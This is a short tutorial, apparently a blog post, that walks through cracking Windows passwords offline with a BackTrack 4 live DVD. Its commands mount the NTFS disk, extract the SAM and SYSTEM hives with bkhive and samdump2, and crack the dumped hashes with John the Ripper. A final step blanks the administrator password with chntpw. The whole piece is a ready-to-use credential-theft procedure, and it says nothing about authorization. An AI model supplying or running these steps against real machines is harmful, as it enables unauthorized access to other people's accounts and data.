Crack Windows password with Back Track 4

In this tutorial we see how to crack Windows password with BT 4.

  • Boot from live DVD of BT4 then start GUI mode with command “startx”

  • Now first thing we want to know that in BT out HDD will appear as “hda” or “sda” device so we check with following command “dmesg | grep hda” this command will show which devices are mount as hda my HDD is also mount in hda1.

  • We need to mount this HDD using following command but first need to start modprobe so type following command “modprobe fuse”

  • For mounting hda1 use following command “ntfsmount /dev/hda1 /mnt/hda1 -o force” we use force option because some times HDD will have dirty sector so we not able mount with out that “-o force” command.

  • Then need to type “mount” so we will see our hda1 is mounted as “/mnt/hda1” and haves writable permission.

  • Now we need to use bkhive with following command “bkhive /mnt/hda1/WINDOWS/system32/config/system anishsys.txt” (NOTE: Linux is case sensitive so “WINDOWS” word should be in Caps.)

  • We use samdump for get hash of sam file with following command “samdump2 /mnt/hda1/WINDOWS/system32/config/SAM anishsys.txt > pass.txt” (NOTE : “WINDOWS” & “SAM” in caps.)

  • So we have Hash in pass.txt we can crack this hash file using “john ripper”

  • First we need to copy pass.txt file in john directory so use following command “cp pass.txt /pentest/passwords/jtr”
  • And use command for cracking hash “./john pass.txt”


That how we can crack windows hash is just five minute. but if there password is in complex policy so it will may be hard to crack with john so we can use rainbow tables for crack password up to 14 characters.

Alternative we can blank administrator password in just in 2 min.

For that go to Shell Console type following command :

CODE :
“chntpw /mnt/hda1/WINDOWS/system32/config/SAM”
then press “1” key and “y” done.

Administrator password is blank.